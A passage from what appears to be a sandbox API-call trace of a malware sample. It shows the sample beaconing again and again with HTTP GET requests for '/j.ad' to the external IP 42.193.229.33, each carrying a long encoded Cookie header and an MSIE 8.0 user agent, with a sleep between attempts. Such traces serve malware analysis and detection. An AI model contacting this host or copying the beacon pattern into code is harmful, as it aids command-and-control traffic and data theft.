FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0136.724] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0136.724] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0136.725] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0136.725] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0136.725] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0136.725] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0136.725] Sleep (dwMilliseconds=0xea60) [0136.741] GetLastError () returned 0x2efd [0136.741] SetLastError (dwErrCode=0x2efd) [0136.741] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0136.741] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0136.741] GetLastError () returned 0x2efd [0136.741] SetLastError (dwErrCode=0x2efd) [0136.741] GetLastError () returned 0x2efd [0136.741] SetLastError (dwErrCode=0x2efd) [0136.741] GetLastError () returned 0x2efd [0136.741] SetLastError (dwErrCode=0x2efd) [0136.741] GetLastError () returned 0x2efd [0136.742] SetLastError (dwErrCode=0x2efd) [0136.742] GetLastError () returned 0x2efd [0136.742] SetLastError (dwErrCode=0x2efd) [0136.742] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0136.742] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0136.742] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0136.742] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0136.742] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0136.742] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0136.742] GetLastError () returned 0x0 [0136.742] SetLastError (dwErrCode=0x0) [0136.742] htonl (hostlong=0x7000000) returned 0x7 [0136.742] htonl (hostlong=0x0) returned 0x0 [0136.743] htonl (hostlong=0x3000000) returned 0x3 [0136.743] htonl (hostlong=0x6000000) returned 0x6 [0136.743] htonl (hostlong=0x6000000) returned 0x6 [0136.743] GetLastError () returned 0x0 [0136.743] SetLastError (dwErrCode=0x0) [0136.743] htonl (hostlong=0x0) returned 0x0 [0136.743] GetLastError () returned 0x0 [0136.743] SetLastError (dwErrCode=0x0) [0136.743] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0136.743] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0138.725] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0138.725] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0138.725] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0138.725] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0138.725] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0138.725] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0138.725] Sleep (dwMilliseconds=0xea60) [0138.737] GetLastError () returned 0x2efd [0138.737] SetLastError (dwErrCode=0x2efd) [0138.737] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0138.737] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0138.738] GetLastError () returned 0x2efd [0138.738] SetLastError (dwErrCode=0x2efd) [0138.738] GetLastError () returned 0x2efd [0138.738] SetLastError (dwErrCode=0x2efd) [0138.738] GetLastError () returned 0x2efd [0138.738] SetLastError (dwErrCode=0x2efd) [0138.738] GetLastError () returned 0x2efd [0138.738] SetLastError (dwErrCode=0x2efd) [0138.738] GetLastError () returned 0x2efd [0138.738] SetLastError (dwErrCode=0x2efd) [0138.738] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0138.738] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0138.738] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0138.738] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0138.738] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0138.739] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0138.739] GetLastError () returned 0x0 [0138.739] SetLastError (dwErrCode=0x0) [0138.739] htonl (hostlong=0x7000000) returned 0x7 [0138.739] htonl (hostlong=0x0) returned 0x0 [0138.739] htonl (hostlong=0x3000000) returned 0x3 [0138.739] htonl (hostlong=0x6000000) returned 0x6 [0138.739] htonl (hostlong=0x6000000) returned 0x6 [0138.739] GetLastError () returned 0x0 [0138.739] SetLastError (dwErrCode=0x0) [0138.739] htonl (hostlong=0x0) returned 0x0 [0138.739] GetLastError () returned 0x0 [0138.739] SetLastError (dwErrCode=0x0) [0138.739] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0138.739] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0140.725] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0140.725] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0140.725] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0140.725] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0140.725] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0140.726] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0140.726] Sleep (dwMilliseconds=0xea60) [0140.734] GetLastError () returned 0x2efd [0140.734] SetLastError (dwErrCode=0x2efd) [0140.741] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0140.741] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0140.742] GetLastError () returned 0x2efd [0140.742] SetLastError (dwErrCode=0x2efd) [0140.742] GetLastError () returned 0x2efd [0140.742] SetLastError (dwErrCode=0x2efd) [0140.742] GetLastError () returned 0x2efd [0140.742] SetLastError (dwErrCode=0x2efd) [0140.742] GetLastError () returned 0x2efd [0140.742] SetLastError (dwErrCode=0x2efd) [0140.742] GetLastError () returned 0x2efd [0140.742] SetLastError (dwErrCode=0x2efd) [0140.742] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0140.742] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0140.742] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0140.742] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0140.743] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0140.743] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0140.743] GetLastError () returned 0x0 [0140.743] SetLastError (dwErrCode=0x0) [0140.743] htonl (hostlong=0x7000000) returned 0x7 [0140.743] htonl (hostlong=0x0) returned 0x0 [0140.743] htonl (hostlong=0x3000000) returned 0x3 [0140.743] htonl (hostlong=0x6000000) returned 0x6 [0140.743] htonl (hostlong=0x6000000) returned 0x6 [0140.743] GetLastError () returned 0x0 [0140.743] SetLastError (dwErrCode=0x0) [0140.743] htonl (hostlong=0x0) returned 0x0 [0140.743] GetLastError () returned 0x0 [0140.743] SetLastError (dwErrCode=0x0) [0140.743] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0140.743] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0142.738] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0142.738] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0142.738] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0142.738] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0142.738] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0142.738] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0142.738] Sleep (dwMilliseconds=0xea60) [0142.746] GetLastError () returned 0x2efd [0142.746] SetLastError (dwErrCode=0x2efd) [0142.752] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0142.752] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0142.752] GetLastError () returned 0x2efd [0142.752] SetLastError (dwErrCode=0x2efd) [0142.752] GetLastError () returned 0x2efd [0142.752] SetLastError (dwErrCode=0x2efd) [0142.752] GetLastError () returned 0x2efd [0142.752] SetLastError (dwErrCode=0x2efd) [0142.752] GetLastError () returned 0x2efd [0142.752] SetLastError (dwErrCode=0x2efd) [0142.752] GetLastError () returned 0x2efd [0142.753] SetLastError (dwErrCode=0x2efd) [0142.753] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0142.753] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0142.753] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0142.753] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0142.753] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0142.753] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0142.753] GetLastError () returned 0x0 [0142.753] SetLastError (dwErrCode=0x0) [0142.754] htonl (hostlong=0x7000000) returned 0x7 [0142.754] htonl (hostlong=0x0) returned 0x0 [0142.754] htonl (hostlong=0x3000000) returned 0x3 [0142.754] htonl (hostlong=0x6000000) returned 0x6 [0142.754] htonl (hostlong=0x6000000) returned 0x6 [0142.754] GetLastError () returned 0x0 [0142.754] SetLastError (dwErrCode=0x0) [0142.754] htonl (hostlong=0x0) returned 0x0 [0142.754] GetLastError () returned 0x0 [0142.754] SetLastError (dwErrCode=0x0) [0142.754] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0142.754] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0144.756] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0144.756] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0144.756] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0144.758] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0144.760] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0144.760] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0144.761] Sleep (dwMilliseconds=0xea60) [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0144.779] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] GetLastError () returned 0x2efd [0144.779] SetLastError (dwErrCode=0x2efd) [0144.779] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0144.779] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0144.780] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0144.780] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0144.780] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0144.780] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0144.780] GetLastError () returned 0x0 [0144.780] SetLastError (dwErrCode=0x0) [0144.781] htonl (hostlong=0x7000000) returned 0x7 [0144.781] htonl (hostlong=0x0) returned 0x0 [0144.782] htonl (hostlong=0x3000000) returned 0x3 [0144.782] htonl (hostlong=0x6000000) returned 0x6 [0144.782] htonl (hostlong=0x6000000) returned 0x6 [0144.782] GetLastError () returned 0x0 [0144.782] SetLastError (dwErrCode=0x0) [0144.783] htonl (hostlong=0x0) returned 0x0 [0144.783] GetLastError () returned 0x0 [0144.783] SetLastError (dwErrCode=0x0) [0144.783] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0144.784] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0146.775] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0146.775] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0146.775] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0146.775] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0146.775] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0146.775] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0146.776] Sleep (dwMilliseconds=0xea60) [0146.787] GetLastError () returned 0x2efd [0146.787] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0146.799] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0146.799] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0146.799] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0146.799] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0146.800] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0146.800] GetLastError () returned 0x0 [0146.804] htonl (hostlong=0x7000000) returned 0x7 [0146.804] htonl (hostlong=0x0) returned 0x0 [0146.804] htonl (hostlong=0x3000000) returned 0x3 [0146.804] htonl (hostlong=0x6000000) returned 0x6 [0146.804] htonl (hostlong=0x6000000) returned 0x6 [0146.804] GetLastError () returned 0x0 [0146.804] htonl (hostlong=0x0) returned 0x0 [0146.804] GetLastError () returned 0x0 [0146.804] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0146.805] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0148.799] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0148.800] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0148.800] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0148.800] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0148.800] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0148.800] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0148.800] Sleep (dwMilliseconds=0xea60) [0148.815] GetLastError () returned 0x2efd [0148.818] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0148.818] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0148.818] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0148.818] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0148.818] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0148.818] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0148.818] GetLastError () returned 0x0 [0148.819] htonl (hostlong=0x7000000) returned 0x7 [0148.819] htonl (hostlong=0x0) returned 0x0 [0148.819] htonl (hostlong=0x3000000) returned 0x3 [0148.819] htonl (hostlong=0x6000000) returned 0x6 [0148.819] htonl (hostlong=0x6000000) returned 0x6 [0148.819] GetLastError () returned 0x0 [0148.819] htonl (hostlong=0x0) returned 0x0 [0148.819] GetLastError () returned 0x0 [0148.819] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0148.819] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0150.807] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0150.808] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0150.808] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0150.808] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0150.808] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0150.808] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0150.808] Sleep (dwMilliseconds=0xea60) [0150.812] GetLastError () returned 0x2efd [0150.813] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0150.813] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0150.813] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0150.813] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0150.813] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0150.813] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0150.813] GetLastError () returned 0x0 [0150.813] htonl (hostlong=0x7000000) returned 0x7 [0150.813] htonl (hostlong=0x0) returned 0x0 [0150.813] htonl (hostlong=0x3000000) returned 0x3 [0150.813] htonl (hostlong=0x6000000) returned 0x6 [0150.813] htonl (hostlong=0x6000000) returned 0x6 [0150.813] GetLastError () returned 0x0 [0150.813] htonl (hostlong=0x0) returned 0x0 [0150.813] GetLastError () returned 0x0 [0150.813] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0150.814] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0152.817] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0152.817] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0152.817] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0152.817] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0152.817] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0152.817] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0152.817] Sleep (dwMilliseconds=0xea60) [0152.824] GetLastError () returned 0x2efd [0152.830] 